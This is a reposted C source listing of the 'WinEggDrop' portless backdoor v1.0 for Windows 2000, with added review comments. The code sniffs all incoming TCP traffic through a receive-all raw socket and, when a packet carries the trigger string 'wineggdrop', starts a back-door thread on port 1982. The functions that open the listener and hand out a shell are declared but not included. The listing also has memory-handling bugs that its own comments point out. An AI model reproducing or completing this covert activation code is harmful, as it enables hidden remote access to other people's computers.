
WinEggDrop后门v1.0源代码

WinEggDrop后门v1.0源代码

信息来源:neeao
代码:
//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Tested Yet)
//**********************************************************************

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

// Some Structures To Define
#define IP_HDRINCL     2   // Not referenced by any code shown on this page
#define SIO_RCVALL       _WSAIOW(IOC_VENDOR,1)   // Winsock ioctl used in DoSniffing to put the raw socket into receive-all mode
#define MAX_PACK_LEN   65535   // Receive buffer size in DoSniffing (largest IPv4 datagram)
#define MAX_ADDR_LEN   16   // Holds a dotted-quad IPv4 string: "255.255.255.255" plus NUL
#define MAX_HOSTNAME_LAN   255   // Buffer size handed to gethostname()

// IPv4 header as laid over the raw receive buffer (20 bytes, no options field;
// option bytes are skipped via the header-length nibble in DecodeIPPack).
typedef struct _iphdr
{
  unsigned char h_lenver;   // Low nibble: header length in 32-bit words (used by DecodeIPPack); high nibble: version
  unsigned char tos;
  unsigned short total_len;
  unsigned short ident;
  unsigned short frag_and_flags;
  unsigned char ttl;
  unsigned char proto;   // Transport protocol; only IPPROTO_TCP is processed further
  unsigned short checksum;
  unsigned int   sourceIP;   // Network byte order; copied into the global SourceIPAddress
  unsigned int   destIP;
}IP_HEADER;

// TCP header as laid over the bytes following the IP header (20 bytes; options
// are skipped via the data-offset nibble in DecodeTCPPack).
typedef struct _tcphdr
{
  USHORT th_sport;   // Network byte order; converted with ntohs before display
  USHORT th_dport;   // Network byte order; converted with ntohs before display
  unsigned int th_seq;
  unsigned int th_ack;
  unsigned char th_lenres;   // High nibble: data offset in 32-bit words (used by DecodeTCPPack)
  unsigned char th_flag;
  USHORT th_win;
  USHORT th_sum;
  USHORT th_urp;
}TCP_HEADER;
// End Of Structure

// Global Variable
char SourceIPAddress[MAX_ADDR_LEN];   // Dotted-quad of the most recent TCP sender; written in DecodeIPPack, read in DecodeTCPPack (the back-door thread presumably reads it too -- its code is not on this page)
int BackDoorPort = 0;   // Port the back door will bind; set in main from argv[1], else 1982

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL   InitSocket();   // Winsock 2.2 startup
BOOL   DoSniffing();   // Raw-socket trigger loop; never returns TRUE until recv() fails
BOOL   DecodeIPPack(const char *Buffer,const int BufferSize);   // IPv4 filter -> DecodeTCPPack
BOOL   DecodeTCPPack(const char * TCPBuffer,const int BufferSize);   // Looks for the activation string in the payload
// The five functions below are declared here but their definitions are not part of this listing.
BOOL   IsWin2KOrAbove();
DWORD WINAPI StartBackDoor(LPVOID Para);   // Thread entry started by DoSniffing once the trigger is seen
BOOL   GetABackDoorShell(const SOCKET ListenSocket);
BOOL   SendSocket(const SOCKET ClientSocket,const char *Message);
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);
//------------------------------------------------------------------------------------------------------
// End Of Function Prototype Declaration

// Main Function
int main(int argc,char *argv[])
{
// Entry point: require Windows 2000 or later, choose the port the back door
// will later bind, start Winsock, then block in the sniffer loop.
// Returns -1 when a precondition fails, 0 if DoSniffing() ever returns.
if (!IsWin2KOrAbove())   // This System Running This Program Is Not Win 2K Or Above (IsWin2KOrAbove is not defined in this listing)
{
  printf("The Program Must Run Under Win 2k Or Above OS\n");   // Display This Message
  return -1;   // Quit The Program
}

if (argc == 2)     // We Get Argument
  BackDoorPort = atoi(argv[1]);     // Argument One Is The Back Door's Port. atoi() yields 0 for non-numeric input and no range check follows
else   // No Argument
  BackDoorPort = 1982;     // Back Door's Port Will Be Defined On 1982

if (!InitSocket())   // Fail To Initize Socket
{
  printf("Fail To Start Up Winsock\n");   // Display Error Message
  return -1;   // Quit The Program
}
DoSniffing();   // Do Sniffing (blocks; its return value is ignored here)
return 0;   // Quit The Program
}// End Of Main Function

//-------------------------------------------------------------------------
// Purpose: To Initize Socket
// Return Type: Boolean
// Parameters: NULL
// This Is Too Simple,I Won't Comment It
//-------------------------------------------------------------------------
BOOL InitSocket()
{
WSADATA wsaData;   // Filled in by WSAStartup; not inspected afterwards

// Request Winsock 2.2. A non-zero return means the library could not be started.
return (WSAStartup(MAKEWORD(2,2), &wsaData) == 0) ? TRUE : FALSE;
}// End Of InitSocket Function

//-------------------------------------------------------------------------
// Purpose: To Do Non-Driver Sniffing
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL DoSniffing()
{
// Passive trigger loop. Opens a raw IP socket bound to the host's first address,
// switches it to receive-all mode (SIO_RCVALL) and hands every datagram to
// DecodeIPPack(). When the decoder reports the activation string, StartBackDoor()
// is run on a thread and this loop blocks until that thread exits. No listening
// port exists before that point, which is the "portless" property; the raw socket
// in receive-all mode is the observable artifact (raw sockets require
// administrative rights on Windows).
// Returns FALSE on any setup failure, TRUE only after recv() reports an error.
int Length=0;   // Variable To Hold The Receive Buffer Length
char RecvBuf[MAX_PACK_LEN] = {0};   // Receive Buffer (64 KiB on the stack)
SOCKET SocketRaw = INVALID_SOCKET;   // Raw Socket

SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);   // Create A Raw Socket
if (SocketRaw == INVALID_SOCKET)     // Fail To Create A Raw Socket
{
  printf("Fail To Create A Raw Socket\n");   // Display Error Message
  return FALSE;   // Return False
}

char FAR name[MAX_HOSTNAME_LAN];

if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)     // Fail To Get The Host Name
{
  printf("Fail To Get Host Name\n");   // Display Error Message
  closesocket(SocketRaw);     // Close The Raw Socket Created
  return FALSE;   // Return False
}

// The Below Is The NIC Stuff
struct hostent FAR * pHostent;
// NOTE(review): the malloc'd block below is leaked immediately -- the next line
// overwrites pHostent with the pointer gethostbyname() returns, which points into
// Winsock-owned storage. The free(pHostent) calls further down therefore release
// memory that was never obtained from malloc (undefined behavior).
pHostent = (struct hostent * )malloc(sizeof(struct hostent));   // Allocate Hostent Buffer
pHostent = gethostbyname(name);   // No NULL check before the dereference below
SOCKADDR_IN sa;
sa.sin_family = AF_INET;   // That's Internet Related
sa.sin_port = htons(0);     // Any Port Avariable On The OS
if (pHostent->h_addr_list[0] != 0)   // We Only Check The First NIC
{
  memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);   // We Use The First NIC As The Sniffing Subject
}
else   // Well,The First NIC Is Not Valid
{
  printf("Get Host By Name Fails\n");     // Display Error Message
  free(pHostent);   // Free The Hostent Buffer (see note above: not a malloc'd pointer)
  closesocket(SocketRaw);
  return FALSE;   // Return FALSE;
}
free(pHostent);   // Free The Hostent Buffer (see note above: not a malloc'd pointer)

if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)   // Bind The Raw Socket On The First NIC,But Fails
{
  printf("Fail To Bind\n");   // Display Error Message
  closesocket(SocketRaw);     // Close The Raw Socket
  return FALSE;   // Return False
}

// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes)
// SIO_RCVALL with an input value of 1 asks the stack to deliver all IP traffic
// seen on the bound interface to this socket. The output buffer is unused.
DWORD dwBufferLen[10] ;
DWORD dwBufferInLen = 1 ;
DWORD dwBytesReturned = 0 ;

if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
{
  closesocket(SocketRaw);   // Silent failure: no message is printed for this case
  return FALSE;
}

while(TRUE)     // Sniffing Starts Here With Forever Loop
{
  // Zeroing the buffer is what gives DecodeTCPPack's strstr() a terminator;
  // a datagram that fills all MAX_PACK_LEN bytes leaves none.
  memset(RecvBuf, 0, sizeof(RecvBuf));   // Reset The Receive Buffer
  Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);   // Try To Receive Data
  if (Length == SOCKET_ERROR)   // Get Error As Receiving Data
  {
    printf("Fail To Receive Data\n");   // Display Error Message
    break;   // Leave The Loop
  }
  if (DecodeIPPack(RecvBuf,Length))   // Decode The Buffer Received,And The Active Code Is Found
  {
    printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);     //We Are Going To Activate The BackDoor
    DWORD dwThreadID;
    // CreateThread's result is not checked for NULL, and the handle is never
    // closed with CloseHandle(). Sniffing is suspended for the whole time the
    // back-door thread runs because of the INFINITE wait below.
    HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);   // Create The Back Door Thread
    WaitForSingleObject(BackDoorThread,INFINITE);   // Wait Until The Back Door Ends
  }
}

// Reached only via the break above, i.e. after a recv() error.
closesocket(SocketRaw);     // Close The Raw Socket
return TRUE;   // Return
}// End Of DoSniffing Function

//-------------------------------------------------------------------------
// Purpose: To Decode The IP Packet
// Return Type: Boolean
// Parameters: 1.const char *Buffer   -->The Received Buffer
//         2.Const int BufferSize -->The Received Buffer Size
//-------------------------------------------------------------------------
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
// Filter one received datagram down to its TCP part.
// Parameters: Buffer     - bytes as returned by recv() on the receive-all raw socket
//             BufferSize - byte count recv() returned; forwarded unchanged, never checked here
// Returns: DecodeTCPPack()'s result for TCP datagrams, FALSE for any other protocol.
// Side effect: overwrites the global SourceIPAddress with the sender's dotted-quad
// address before the payload is examined.
// NOTE(review): BufferSize is never compared against sizeof(IP_HEADER) or the
// derived header length, so the casts below trust the packet's own length fields.
IP_HEADER *pIpheader;   // IP Header
SOCKADDR_IN saSource, saDest;   // saDest is declared but never used
pIpheader = (IP_HEADER *)Buffer;     // Transfer The Buffer Into IP Header Form
int Protocol = pIpheader->proto;     // Get The Protocol
if ((Protocol != IPPROTO_TCP))   // Not TCP Protocol
{
  return FALSE;   // Return False Since We Only Interest In TCP Protocol
}

saSource.sin_addr.s_addr = pIpheader->sourceIP;
// inet_ntoa() yields at most 15 characters plus NUL, so the 16-byte destination
// is always terminated for valid output.
strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);   // Get The Source IP(Important For Doing Reverse Connection)

int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);   // Low nibble is the header length in 32-bit words; IP options are skipped this way
return DecodeTCPPack(Buffer+IPLength, BufferSize);     // Decode TCP Packer. BufferSize is not reduced by IPLength (DecodeTCPPack ignores it anyway)
}// End Of DecodeIPPack Function

//-------------------------------------------------------------------------
// Purpose: To Decode The TCP Packet
// Return Type: Boolean
// Parameters: 1.const char *TCPBuffer -->The TCP Buffer
//         2.Const int BufferSize   -->The TCP Buffer Size
//-------------------------------------------------------------------------
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
{
// Search the TCP payload for the activation string.
// Parameters: TCPBuffer  - start of the TCP header inside the received datagram
//             BufferSize - unused; no read in this function is bounded by it
// Returns: TRUE when the payload contains "wineggdrop" (the caller then starts the
// back door), FALSE otherwise.
// Detection note: the trigger is a plaintext, case-sensitive literal accepted in a
// TCP segment to any destination port, so it is visible as-is to network inspection.
// NOTE(review): strstr() scans until a NUL byte. It relies on the caller having
// zeroed the buffer beyond the received bytes and reads past the end of a payload
// that contains no NUL and fills the buffer.
TCP_HEADER * pTcpHeader;   // TCP Header
int iSourcePort,iDestPort;     // Source Port And DestPort

pTcpHeader = (TCP_HEADER * )TCPBuffer;     // Transfer The Buffer Into TCP Header Form
int TcpHeaderLen = pTcpHeader->th_lenres>>4;   // High nibble is the data offset in 32-bit words
TcpHeaderLen *= sizeof(unsigned long);   // Words to bytes
char * TcpData=TCPBuffer+TcpHeaderLen;     // Get The TCP Data (this drops const from TCPBuffer; compilers warn)

iSourcePort = ntohs(pTcpHeader->th_sport);   // Get The Source Port
iDestPort = ntohs(pTcpHeader->th_dport);   // Get The Destination Port
if (strstr(TcpData,"wineggdrop")!=NULL)   // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo
{
  printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);   // Display A Message (SourceIPAddress was set by DecodeIPPack)
  return TRUE;   // Return TRUE(The Back Door Will Be Activated Soon)
}
return FALSE;   // We Didn't Receive An Active Code,Return False
}// End Of DecodeTCPPack Function
//-------------------------------------------------------------------------

